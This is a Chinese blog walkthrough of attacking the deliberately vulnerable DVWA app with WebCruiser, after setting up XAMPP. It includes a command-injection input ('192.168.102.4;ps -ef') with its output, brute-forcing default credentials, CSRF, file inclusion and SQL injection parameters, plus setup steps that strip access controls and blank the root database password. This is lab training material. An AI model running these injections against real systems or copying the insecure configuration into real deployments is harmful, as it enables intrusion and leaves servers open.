【网络安全】DVWA和WebCruiser攻击演练过程详解

1、下载dvwa和xampp linux版本https://www.apachefriends.org/zh_cn/index.html2、安装xampp./xampp.run根据提示进行安装即可,安装后目录为/opt/lampp./xampp start./sampp stop启动后客户端机器远程使用IP地址无法访问xampp服务器(),vi ./etc/extra/httpd-xampp.conf,注释掉下面的代码重启xampp即可 61 #<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))"> 62 # Require local 63 # ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var 64 #</LocationMatch>看到主界面说明安装成功。测试数据库连接:./bin目录下用mysql连接数据库mysql -h localhost -u root直接进入:执行如下语句成功即可看到数据库信息,说明xampp安装成功show database();3、安装dvwa直接解压到./htdocs目录即可,然后利用ip/dvwa目录访问,则提示数据库无法连接,按下面修改即可vi htdocs/dvwa/config/config.inc.php将下面的密码信息去除改为空密码即可 16 $_DVWA = array(); 17 $_DVWA[ ‘db_server’ ] = ‘localhost’; 18 $_DVWA[ ‘db_database’ ] = ‘dvwa’; 19 $_DVWA[ ‘db_user’ ] = ‘root’; 20 $_DVWA[ ‘db_password’ ] = ”; 4、进入登录界面,需要输入用户名和密码admin/password,将DVWA Security设置为low5、windows下使用WebCrusier进行主要攻击验证WebCrusier: a、brute force暴力破解用户名密码为admin/password ,主要是利用post/get提交username和password数据进行暴力破解。b、command execute未对命令进行判断可以执行多条命令输入:192.168.102.4;ps -efPING 192.168.102.4 (192.168.102.4) 56(84) bytes of data.64 bytes from 192.168.102.4: icmp_seq=1 ttl=64 time=0.019 ms64 bytes from 192.168.102.4: icmp_seq=2 ttl=64 time=0.024 ms64 bytes from 192.168.102.4: icmp_seq=3 ttl=64 time=0.036 ms— 192.168.102.4 ping statistics —3 packets transmitted, 3 received, 0% packet loss, time 2000msrtt min/avg/max/mdev = 0.019/0.026/0.036/0.008 msUID PID PPID C STIME TTY TIME CMDroot 1 0 0 1月07 ? 00:00:36 /usr/lib/systemd/systemd –switched-root –system –deserialize 19root 2 0 0 1月07 ? 00:00:00 [kthreadd]root 3 2 0 1月07 ? 00:00:08 [ksoftirqd/0]root 5 2 0 1月07 ? 00:00:00 [kworker/0:0H]root 7 2 0 1月07 ? 00:00:08 [migration/0]root 8 2 0 1月07 ? 00:00:00 [rcu_bh]root 9 2 0 1月07 ? 00:11:38 [rcu_sched]root 10 2 0 1月07 ? 00:00:44 [watchdog/0]root 11 2 0 1月07 ? 00:00:28 [watchdog/1]root 12 2 0 1月07 ? 00:00:06 [migration/1]root 13 2 0 1月07 ? 00:00:08 [ksoftirqd/1]root 15 2 0 1月07 ? 00:00:00 [kworker/1:0H]root 16 2 0 1月07 ? 00:00:28 [watchdog/2]root 17 2 0 1月07 ? 00:00:06 [migration/2]root 18 2 0 1月07 ? 00:00:07 [ksoftirqd/2]root 20 2 0 1月07 ? 00:00:00 [kworker/2:0H]root 21 2 0 1月07 ? 00:00:27 [watchdog/3]root 22 2 0 1月07 ? 00:00:06 [migration/3]root 23 2 0 1月07 ? 00:00:13 [ksoftirqd/3]root 25 2 0 1月07 ? 00:00:00 [kworker/3:0H]root 26 2 0 1月07 ? 00:00:59 [watchdog/4]root 27 2 0 1月07 ? 00:00:07 [migration/4]root 28 2 0 1月07 ? 00:00:02 [ksoftirqd/4]root 30 2 0 1月07 ? 00:00:00 [kworker/4:0H]root 31 2 0 1月07 ? 00:02:46 [watchdog/5]root 32 2 0 1月07 ? 00:00:08 [migration/5]root 33 2 0 1月07 ? 00:00:02 [ksoftirqd/5]root 35 2 0 1月07 ? 00:00:00 [kworker/5:0H]c、Cross Site Request Forgery (CSRF)没有对输入原密码验证直接判断两个密码是否相等后直接修改密码d、File Inclusion通过修改包含文件可以查看到相关文件信息?page=include.phpe、SQL注入?Submit=Submit&id=99999999?Submit=Submit&id=1588033?Submit=Submit&id=1588033

通过右键sql injection poc进入后可以查看数据库和表及数据信息如图1和2所示

从一开始就提醒自己,世上没有后悔药吃。

【网络安全】DVWA和WebCruiser攻击演练过程详解

相关文章:

你感兴趣的文章:

标签云: